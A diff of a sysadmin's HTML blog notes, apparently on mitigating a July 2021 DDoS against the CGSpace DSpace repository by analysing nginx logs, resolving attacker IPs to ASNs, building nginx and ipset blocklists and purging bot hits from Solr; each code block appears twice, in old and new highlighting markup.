<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi)&#39; | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 57 dspaceApi
</span></span><span style="display:flex;"><span> 2671 dspaceWeb
</span></span></code></pre></div><ul>
<li>I ran all updates on the server (linode18) and restarted it, then DSpace came back up</li>
<li>I sent a message to Atmire, as I never heard from them last week when we blocked access to the REST API for two days for them to investigate the server issues</li>
<li>Clone the <code>openrxv-items-temp</code> index on AReS and re-run all the plugins, but most of the &ldquo;dspace_add_missing_items&rdquo; tasks failed so I will just run a full re-harvest</li>
@ -338,31 +338,31 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -n
32 91.243.191.124
33 91.243.191.129
33 91.243.191.200
34 91.243.191.115
34 91.243.191.154
34 91.243.191.234
34 91.243.191.56
35 91.243.191.187
35 91.243.191.91
36 91.243.191.58
37 91.243.191.209
39 91.243.191.119
39 91.243.191.144
39 91.243.191.55
40 91.243.191.112
40 91.243.191.182
40 91.243.191.57
40 91.243.191.98
41 91.243.191.106
44 91.243.191.79
45 91.243.191.151
46 91.243.191.103
56 91.243.191.172
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 32 91.243.191.124
</span></span><span style="display:flex;"><span> 33 91.243.191.129
</span></span><span style="display:flex;"><span> 33 91.243.191.200
</span></span><span style="display:flex;"><span> 34 91.243.191.115
</span></span><span style="display:flex;"><span> 34 91.243.191.154
</span></span><span style="display:flex;"><span> 34 91.243.191.234
</span></span><span style="display:flex;"><span> 34 91.243.191.56
</span></span><span style="display:flex;"><span> 35 91.243.191.187
</span></span><span style="display:flex;"><span> 35 91.243.191.91
</span></span><span style="display:flex;"><span> 36 91.243.191.58
</span></span><span style="display:flex;"><span> 37 91.243.191.209
</span></span><span style="display:flex;"><span> 39 91.243.191.119
</span></span><span style="display:flex;"><span> 39 91.243.191.144
</span></span><span style="display:flex;"><span> 39 91.243.191.55
</span></span><span style="display:flex;"><span> 40 91.243.191.112
</span></span><span style="display:flex;"><span> 40 91.243.191.182
</span></span><span style="display:flex;"><span> 40 91.243.191.57
</span></span><span style="display:flex;"><span> 40 91.243.191.98
</span></span><span style="display:flex;"><span> 41 91.243.191.106
</span></span><span style="display:flex;"><span> 44 91.243.191.79
</span></span><span style="display:flex;"><span> 45 91.243.191.151
</span></span><span style="display:flex;"><span> 46 91.243.191.103
</span></span><span style="display:flex;"><span> 56 91.243.191.172
</span></span></code></pre></div><ul>
<li>I found a few people complaining about these Russian attacks too:
<ul>
<li><a href="https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578">https://community.cloudflare.com/t/russian-ddos-completley-unmitigated-by-cloudflare/284578</a></li>
@ -392,22 +392,22 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./asn -n 45.80.217.235
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>╭──────────────────────────────╮
│ ASN lookup for 45.80.217.235 │
╰──────────────────────────────╯
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 45.80.217.235 ┌PTR -
├ASN 46844 (ST-BGP, US)
├ORG Sharktech
├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
├ABU info@traffictransitsolution.us
├ROA ✓ VALID (1 ROA found)
├TYP Proxy host Hosting/DC
├GEO Los Angeles, California (US)
└REP ✓ NONE
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./asn -n 45.80.217.235
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>╭──────────────────────────────╮
</span></span><span style="display:flex;"><span>│ ASN lookup for 45.80.217.235 │
</span></span><span style="display:flex;"><span>╰──────────────────────────────╯
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 45.80.217.235 ┌PTR -
</span></span><span style="display:flex;"><span> ├ASN 46844 (ST-BGP, US)
</span></span><span style="display:flex;"><span> ├ORG Sharktech
</span></span><span style="display:flex;"><span> ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
</span></span><span style="display:flex;"><span> ├ABU info@traffictransitsolution.us
</span></span><span style="display:flex;"><span> ├ROA ✓ VALID (1 ROA found)
</span></span><span style="display:flex;"><span> ├TYP Proxy host Hosting/DC
</span></span><span style="display:flex;"><span> ├GEO Los Angeles, California (US)
</span></span><span style="display:flex;"><span> └REP ✓ NONE
</span></span></code></pre></div><ul>
<li>Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:</li>
</ul>
<pre tabindex="0"><code class="language-csv" data-lang="csv">IP, Organization, Website, Network
@ -496,56 +496,56 @@ postgres@linode18:~$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ips-sorted.txt
# wc -l /tmp/ips-sorted.txt
10776 /tmp/ips-sorted.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ips-sorted.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ips-sorted.txt
</span></span><span style="display:flex;"><span>10776 /tmp/ips-sorted.txt
</span></span></code></pre></div><ul>
<li>Then resolve them all:</li>
</ul>
<pre tabindex="0"><code class="language-console:" data-lang="console:">$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
</code></pre><ul>
<li>Then get the top 10 organizations and top ten ASNs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
213 AMAZON-AES
218 ASN-QUADRANET-GLOBAL
246 Silverstar Invest Limited
347 Ethiopian Telecommunication Corporation
475 DEDIPATH-LLC
504 AS-COLOCROSSING
598 UAB Rakrejus
814 UGB Hosting OU
1010 ST-BGP
1757 Global Layer B.V.
$ csvcut -c <span style="color:#ae81ff">3</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
213 14618
218 8100
246 35624
347 24757
475 35913
504 36352
598 62282
814 206485
1010 46844
1757 49453
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 213 AMAZON-AES
</span></span><span style="display:flex;"><span> 218 ASN-QUADRANET-GLOBAL
</span></span><span style="display:flex;"><span> 246 Silverstar Invest Limited
</span></span><span style="display:flex;"><span> 347 Ethiopian Telecommunication Corporation
</span></span><span style="display:flex;"><span> 475 DEDIPATH-LLC
</span></span><span style="display:flex;"><span> 504 AS-COLOCROSSING
</span></span><span style="display:flex;"><span> 598 UAB Rakrejus
</span></span><span style="display:flex;"><span> 814 UGB Hosting OU
</span></span><span style="display:flex;"><span> 1010 ST-BGP
</span></span><span style="display:flex;"><span> 1757 Global Layer B.V.
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">3</span> /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 213 14618
</span></span><span style="display:flex;"><span> 218 8100
</span></span><span style="display:flex;"><span> 246 35624
</span></span><span style="display:flex;"><span> 347 24757
</span></span><span style="display:flex;"><span> 475 35913
</span></span><span style="display:flex;"><span> 504 36352
</span></span><span style="display:flex;"><span> 598 62282
</span></span><span style="display:flex;"><span> 814 206485
</span></span><span style="display:flex;"><span> 1010 46844
</span></span><span style="display:flex;"><span> 1757 49453
</span></span></code></pre></div><ul>
<li>I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I&rsquo;m concerned about Global Layer because it&rsquo;s a huge ASN that seems to have legit hosts too&hellip;?</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
$ cat AS* | sort | uniq &gt; /tmp/abusive-networks.txt
$ wc -l /tmp/abusive-networks.txt
2276 /tmp/abusive-networks.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
</span></span><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
</span></span><span style="display:flex;"><span>$ cat AS* | sort | uniq &gt; /tmp/abusive-networks.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/abusive-networks.txt
</span></span><span style="display:flex;"><span>2276 /tmp/abusive-networks.txt
</span></span></code></pre></div><ul>
<li>Combining with my existing rules and filtering uniques:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
2298
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2298
</span></span></code></pre></div><ul>
<li><a href="https://scamalytics.com/ip/isp/2021-06">According to Scamalytics all these are high risk ISPs</a> (as recently as 2021-06) so I will just keep blocking them</li>
<li>I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through&hellip; sigh</li>
<li>The next thing I need to do is purge all the IPs from Solr using grepcidr&hellip;</li>
@ -558,12 +558,12 @@ $ wc -l /tmp/abusive-networks.txt
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/all-ips-to-block.txt
$ wc -l /tmp/all-ips-to-block.txt
5095 /tmp/all-ips-to-block.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/all-ips-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/all-ips-to-block.txt
</span></span><span style="display:flex;"><span>5095 /tmp/all-ips-to-block.txt
</span></span></code></pre></div><ul>
<li>Then I added them to the normal ipset we are already using with firewalld
<ul>
<li>I will check again in a few hours and ban more</li>
@ -571,10 +571,10 @@ $ wc -l /tmp/all-ips-to-block.txt
</li>
<li>I decided to extract the networks from the GeoIP database with <code>resolve-addresses-geoip2.py</code> so I can block them more efficiently than using the 5,000 IPs in an ipset:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/all-networks-to-block.txt
$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
2354
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(206485|35624|36352|46844|49453|62282)$&#39;</span> /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/all-networks-to-block.txt
</span></span><span style="display:flex;"><span>$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2354
</span></span></code></pre></div><ul>
<li>Combined with the previous networks this brings about 200 more for a total of 2,354 networks
<ul>
<li>I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from <a href="https://www.spamhaus.org/drop/">Spamhaus&rsquo;s DROP and EDROP lists</a>, for example)</li>
@ -582,51 +582,51 @@ $ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq
</li>
<li>Then I got a list of all the 5,095 IPs from above and used <code>check-spider-ip-hits.sh</code> to purge them from Solr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
...
Total number of bot hits purged: 197116
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Total number of bot hits purged: 197116
</span></span></code></pre></div><ul>
<li>I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level</li>
</ul>
<h2 id="2021-07-20">2021-07-20</h2>
<ul>
<li>Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, it&rsquo;s much higher than I noticed yesterday:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
5643
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5643
</span></span></code></pre></div><ul>
<li>I purged 27,000 more hits from the Solr stats using this new list of IPs with my <code>check-spider-ip-hits.sh</code> script</li>
<li>Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips-june-23.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">15</span>
265 GOOGLE,15169
277 Silverstar Invest Limited,35624
280 FACEBOOK,32934
288 SAFARICOM-LIMITED,33771
399 AMAZON-AES,14618
427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
455 Opera Software AS,39832
481 MTN NIGERIA Communication limited,29465
502 DEDIPATH-LLC,35913
506 AS-COLOCROSSING,36352
602 UAB Rakrejus,62282
822 ST-BGP,46844
874 Ethiopian Telecommunication Corporation,24757
912 UGB Hosting OU,206485
1607 Global Layer B.V.,49453
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/all-ips-june-23.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
</span></span><span style="display:flex;"><span>$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span> 265 GOOGLE,15169
</span></span><span style="display:flex;"><span> 277 Silverstar Invest Limited,35624
</span></span><span style="display:flex;"><span> 280 FACEBOOK,32934
</span></span><span style="display:flex;"><span> 288 SAFARICOM-LIMITED,33771
</span></span><span style="display:flex;"><span> 399 AMAZON-AES,14618
</span></span><span style="display:flex;"><span> 427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
</span></span><span style="display:flex;"><span> 455 Opera Software AS,39832
</span></span><span style="display:flex;"><span> 481 MTN NIGERIA Communication limited,29465
</span></span><span style="display:flex;"><span> 502 DEDIPATH-LLC,35913
</span></span><span style="display:flex;"><span> 506 AS-COLOCROSSING,36352
</span></span><span style="display:flex;"><span> 602 UAB Rakrejus,62282
</span></span><span style="display:flex;"><span> 822 ST-BGP,46844
</span></span><span style="display:flex;"><span> 874 Ethiopian Telecommunication Corporation,24757
</span></span><span style="display:flex;"><span> 912 UGB Hosting OU,206485
</span></span><span style="display:flex;"><span> 1607 Global Layer B.V.,49453
</span></span></code></pre></div><ul>
<li>Again it was over 5,000 IPs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
5228
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624)$&#39;</span> /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5228
</span></span></code></pre></div><ul>
<li>Interestingly, it seems these are five thousand <em>different</em> IP addresses than the attack from last weekend, as there are over 10,000 unique ones if I combine them!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
10458
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>10458
</span></span></code></pre></div><ul>
<li>I purged all the (26,000) hits from these new IP addresses from Solr as well</li>
<li>Looking back at my notes for the 2019-05 attack I see that I had already identified most of these network providers (!)&hellip;
<ul>
@ -636,30 +636,30 @@ $ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span
</li>
<li>Adding QuadraNet brings the total networks seen during these two attacks to 262, and the number of unique IPs to 10900:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ddos-ips.txt
# wc -l /tmp/ddos-ips.txt
54002 /tmp/ddos-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ddos-ips-to-purge.txt
$ wc -l /tmp/ddos-ips-to-purge.txt
10900 /tmp/ddos-ips-to-purge.txt
$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/ddos-networks-to-block.txt
$ wc -l /tmp/ddos-networks-to-block.txt
262 /tmp/ddos-networks-to-block.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 /var/log/nginx/access.log.3 /var/log/nginx/access.log.4 /var/log/nginx/access.log.5 /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E <span style="color:#e6db74">&#34; (200|499) &#34;</span> | grep -v -E <span style="color:#e6db74">&#34;(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)&#34;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span>54002 /tmp/ddos-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ddos-ips.txt -o /tmp/ddos-ips.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c ip | sed 1d | sort | uniq &gt; /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>10900 /tmp/ddos-ips-to-purge.txt
</span></span><span style="display:flex;"><span>$ csvgrep -c asn -r <span style="color:#e6db74">&#39;^(49453|46844|206485|62282|36352|35913|35624|8100)$&#39;</span> /tmp/ddos-ips.csv | csvcut -c network | sed 1d | sort | uniq &gt; /tmp/ddos-networks-to-block.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ddos-networks-to-block.txt
</span></span><span style="display:flex;"><span>262 /tmp/ddos-networks-to-block.txt
</span></span></code></pre></div><ul>
<li>The new total number of networks to block, including the network prefixes for these ASNs downloaded from asn.ipinfo.app, is 4,007:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span>https://asn.ipinfo.app/api/text/nginx/AS46844 \
https://asn.ipinfo.app/api/text/nginx/AS206485 \
https://asn.ipinfo.app/api/text/nginx/AS62282 \
https://asn.ipinfo.app/api/text/nginx/AS36352 \
https://asn.ipinfo.app/api/text/nginx/AS35913 \
https://asn.ipinfo.app/api/text/nginx/AS35624 \
https://asn.ipinfo.app/api/text/nginx/AS8100
$ cat AS* /tmp/ddos-networks-to-block.txt | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
4007
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS49453 <span style="color:#ae81ff">\
